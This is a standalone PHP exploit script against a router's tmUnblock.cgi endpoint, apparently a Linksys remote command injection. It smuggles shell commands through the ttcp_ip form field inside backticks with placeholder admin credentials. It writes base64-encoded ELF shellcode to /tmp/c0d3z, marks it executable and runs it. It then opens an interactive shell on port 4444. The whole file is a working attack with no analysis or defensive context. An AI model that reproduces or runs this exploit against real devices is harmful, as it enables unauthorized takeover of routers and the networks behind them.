#!/usr/bin/php
<?php
error_reporting (0);
$host = "192.168.1.1" ;
$port = "8080" ;
$vuln = "tmUnblock.cgi" ;
$shellcode = base64_decode (
"f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA" .
"AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA" .
"AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV" .
"BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/" .
"ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ" .
"FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI" .
"EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw" .
"8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB" .
"UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P" .
"+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp" .
"bi9zaA=="
);
function full_urlencode( $string ) {
$ret = "" ;
for ( $c =0; $c < strlen ( $string ); $c ++) {
if ( $string [ $c ] != '&' )
$ret .= "%" . dechex (ord( $string [ $c ]));
else
$ret .= "&" ;
}
return $ret ;
}
function build_payload( $host , $port , $vuln , $shellcode ) {
echo "\tCleaning up... " ;
$cleanup = build_packet( $host , $port , $vuln , "rm /tmp/c0d3z" );
if (!send_packet( $host , $port , $cleanup )) die ( "fail\n" );
else echo "done!\n" ;
for ( $i =0; $i < strlen ( $shellcode ); $i +=20) {
echo "\tSending " . $i . "/" . strlen ( $shellcode ). " bytes... " ;
$cmd = "echo -en '" ;
for ( $c = $i ; $c < $i +20 && $c < strlen ( $shellcode ); $c ++) {
$cmd .= "\\0" . decoct (ord( $shellcode [ $c ]));
}
$cmd .= "' >> /tmp/c0d3z" ;
$cmd = build_packet( $host , $port , $vuln , $cmd );
if (!send_packet( $host , $port , $cmd )) die ( "fail\n" );
else echo "sent!\n" ;
usleep(100000);
}
echo "\tConfiguring... " ;
$config = build_packet( $host , $port , $vuln , "chmod a+rwx /tmp/c0d3z" );
if (!send_packet( $host , $port , $config )) die ( "fail\n" );
else echo "done!\n" ;
}
function build_packet( $host , $port , $vuln , $payload ) {
$exploit = full_urlencode(
"submit_button=&" .
"change_action=&" .
"submit_type=&" .
"action=&" .
"commit=0&" .
"ttcp_num=2&" .
"ttcp_size=2&" .
"ttcp_ip=-h `" . $payload . "`&" .
"StartEPI=1"
);
$packet =
"POST /" . $vuln . " HTTP/1.1\r\n" .
"Host: " . $host . "\r\n" .
"Authorization: Basic " . base64_encode ( "admin:ThisCanBeAnything" ). "\r\n" .
"Content-Type: application/x-www-form-urlencoded\r\n" .
"Content-Length: " . strlen ( $exploit ). "\r\n" .
"\r\n" .
$exploit ;
return $packet ;
}
function send_packet( $host , $port , $packet ) {
$socket = fsockopen ( $host , $port , $errno , $errstr );
if (! $socket ) return false;
if (!fwrite( $socket , $packet )) return false;
fclose( $socket );
return true;
}
echo "Testing connection to target... " ;
$socket = fsockopen ( $host , $port , $errno , $errstr , 30);
if (! $socket ) die ( "fail\n" );
else echo "connected!\n" ;
fclose( $socket );
echo "Sending payload... \n" ;
build_payload( $host , $port , $vuln , $shellcode );
sleep(3);
echo "Executing payload... " ;
if (!send_packet( $host , $port , build_packet( $host , $port , $vuln , "/tmp/c0d3z" ))) die ( "fail\n" );
else echo "done!\n" ;
sleep(3);
echo "Attempting to get a shell... " ;
$socket = fsockopen ( $host , 4444, $errno , $errstr , 30);
if (! $socket ) die ( "fail\n" );
else echo "connected!\n" ;
echo "Opening shell... \n" ;
while (! feof ( $socket )) {
$cmd = readline( $host . "$ " );
if (! empty ( $cmd )) readline_add_history( $cmd );
fwrite( $socket , $cmd . ";echo xxxEOFxxx\n" );
$data = "" ;
do {
$data .= fread ( $socket , 1);
} while ( strpos ( $data , "xxxEOFxxx" ) === false && ! feof ( $socket ));
echo str_replace ( "xxxEOFxxx" , "" , $data );
}
?>
|